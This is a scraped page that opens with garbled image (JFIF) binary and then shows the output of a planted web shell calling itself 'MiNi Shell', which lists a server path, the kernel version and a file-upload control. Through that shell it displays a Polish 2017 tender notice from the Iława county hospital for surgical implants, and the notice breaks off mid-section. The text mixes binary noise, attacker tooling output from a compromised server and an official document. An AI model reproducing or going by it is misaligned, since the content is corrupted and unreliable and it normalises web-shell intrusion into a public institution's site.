JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170127/15299-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://' target='_blank'>http://</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 15299 - 2017
              z dnia 2017-01-27 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Iława: Dostawa implantów chirurgicznych z podziałem na 3 części dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiatowy Szpital im. Władysława Biegańskiego w Iławie, krajowy numer identyfikacyjny
              51087919600000, ul.
              ul. Gen. Wł. Andersa 
              3,
              14200  
              Iława, woj.
              warmińsko-mazurskie, państwo
              Polska, tel.
              896 449 601, e-mail
              dzp@szpital.ilawa.pl, faks
              896 492 425.
              <br />
              Adres strony internetowej (URL): www.szpital.ilawa.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Podmiot prawa publicznego
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.szital.ilawa.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa implantów chirurgicznych z podziałem na 3 części dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie<br /><b>Numer referencyjny: </b>3/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />3<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest dostawa implantów chirurgicznych z podziałem na 3 części dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie (nr sprawy 3/2017)

Część nr 1 Gwoździe śródszpikowe i płytki blokowane
Część nr 2 Implanty chirurgiczne
Część nr 3 Mikropłytki
Szczegółowy opis przedmiotu zamówienia znajduje się w rozdziale XVIII SIWZ oraz w załączniku nr 2 Formularz cenowy.<br /><br /><b>II.5) Główny kod CPV: </b>33169000-2<br /><b> Dodatkowe kody CPV:</b>33162000-3,
                33184100-4,
                33141770-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 12<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Wykonawca może zwrócić się do zamawiającego o wyjaśnienie treści specyfikacji istotnych warunków zamówienia. Zamawiający udzieli wyjaśnień niezwłocznie, nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem, że wniosek o wyjaśnienie treści specyfikacji istotnych warunków zamówienia wpłynął do zamawiającego nie później niż do końca dnia, w którym upływa połowa wyznaczonego terminu składania ofert, tj. 01.02.2017 r. (art. 38 ust.1).</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia wymagań w zakresie spełnienia tego warunku.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia wymagań w zakresie spełnienia tego warunku.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie stawia wymagań w zakresie spełnienia tego warunku.	<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Oświadczenie Wykonawcy wykazujące brak podstaw do wykluczenia w postępowaniu, które stanowi załącznik nr 4 do SIWZ.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">B. Na etapie składania ofert , oferta powinna zawierać:
1. Sporządzony przez wykonawcę, według wzoru stanowiącego załącznik nr 1 do SIWZ, Formularz ofertowy,
2. Sporządzony przez wykonawcę, według wzoru stanowiącego załącznik nr 2 do SIWZ, Formularz cenowy,
3.  Oświadczenie o którym mowa w rozdziale VII A pkt. 1.1. SIWZ. , które stanowi załącznik nr 4
do SIWZ
4.	Dokument KRS lub CEiDG w celu weryfikacji osób uprawnionych do reprezentowania wykonawcy tym samym składania oświadczenia woli. (z zastrzeżeniem art. 26 ust 6.)
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Termin płatności </td><td>20</td></tr><tr><td>Termin dostawy </td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Strony dopuszczają zmiany treści umowy czasowe lub trwałe w trakcie jej obowiązywania, 
w przypadku gdy:
1.1. zmiana dotyczy nieistotnych postanowień zawartej umowy,
1.2.  podczas realizacji umowy wystąpią nieprzewidywalne zdarzenia lub okoliczności, jak w szczególności klęski żywiołowe, strajki, zamieszki, konflikty zbrojne, które uniemożliwiają zrealizowanie przedmiotu zamówienia w sposób, w zakresie i w terminie przewidzianym w ofercie.
1.3.w wyniku istotnej zmiany stosunków spełnianie świadczenia byłoby połączone z nadmiernymi trudnościami lub groziłoby, co najmniej jednej ze stron znaczną stratą, a czego strony nie mogły przewidzieć przy zawarciu umowy  w przypadku istotnej zmiany stosunków takiej jak znaczny wzrost cen surowców, nośników energii itp.
1.4.zmiana dotyczy obniżenia cen jednostkowych poszczególnych elementów przedmiotu zamówienia 
w przypadku promocji, ogólnej obniżki cen na dany asortyment itp.
1.5.zmiana dotyczy zmian koniecznych ze względu na zmianę powszechnie obowiązujących przepisów prawa, w szczególności stawek podatku VAT, stawek celnych - w przypadku zaistnienia takich zmian.
2.	Wprowadzenie zmian określonych w ust. 1 wymaga uzasadnienia konieczności zmiany 
i porozumienia stron oraz sporządzenia aneksu do umowy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 06/02/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              PL<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>GWOŹDZIE ŚRÓDSZPIKOWE I PŁYTKI BLOKOWANE<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wymagania konieczne: 
